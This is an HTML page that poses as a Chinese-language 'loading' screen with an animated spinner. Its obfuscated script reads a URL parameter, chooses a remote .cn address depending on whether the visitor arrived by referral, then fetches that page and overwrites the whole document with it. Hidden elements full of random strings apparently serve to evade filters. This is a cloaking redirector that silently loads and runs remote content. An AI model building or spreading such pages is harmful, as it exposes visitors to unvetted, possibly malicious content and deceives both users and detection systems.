<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cpuuF2O {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cpuuF2O .GEopublKa {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cpuuF2O .content {
            line-height: 50px;
            text-align: center
        }

        .cpuuF2O .img {
            width: 100%
        }

        .cpuuF2O .vmMjbj {
            text-align: center
        }

        .cpuuF2O .vmMjbj span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cpuuF2O .vmMjbj span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cpuuF2O .vmMjbj span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cpuuF2O .vmMjbj span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cpuuF2O .vmMjbj span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cpuuF2O .vmMjbj span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cpuuF2O .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function EVhjXtlq3(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var u4Vbs5k = EVhjXtlq3('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ u4Vbs5k +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ u4Vbs5k +".html?a=share";
		}
		
        RMTeSPaNa=url+"#"+new Date().getTime();
        RMTeSPaNa && function() {
            $.get(RMTeSPaNa, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >DP4JOssuis1lAPDkr7deezzXsptO1LnL9O7nEEuEUaMArUb1adDNwy9RLWkbeMiTcJa7GXHBQwblyaml44ruCr4zrdZuRA4</b>
<ul style='display:none' >jXcbfDB6jntxTxeJ</ul>
<li style='display:none' >kvMel1GJP5UuBEb18mysaFRii0H6Ry6uL4sjcVXRfrlc</li>
<h1 style='display:none' >J1zC21e9oa63d8Rn4x</h1>
<img  src='' style='display:none'><div class="cpuuF2O">
    <div class="GEopublKa">
        <div class="vmMjbj">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>hKBJUXaQVBBAL7qDBvMCfUrQpW6GgcKxG95fGrtfxsAglhXoEqFhs1sliGKsN29pPnVaGaC1g3wGHAwy4LyT</p>
<span style='display:none'>aMepbsgJNKTg0dKdvI8dRxKAtrVxWNSbiiDb5zc43L058uM1K6hLGcHYZO4J3AKmh3</span>
<h1 style='display:none' >dvsoLaDHxqC8E0t17c2gD0AxVOqzbsjscZ5BuzCaETC1ePuL3NToAmqWvfb</h1></body>
</html>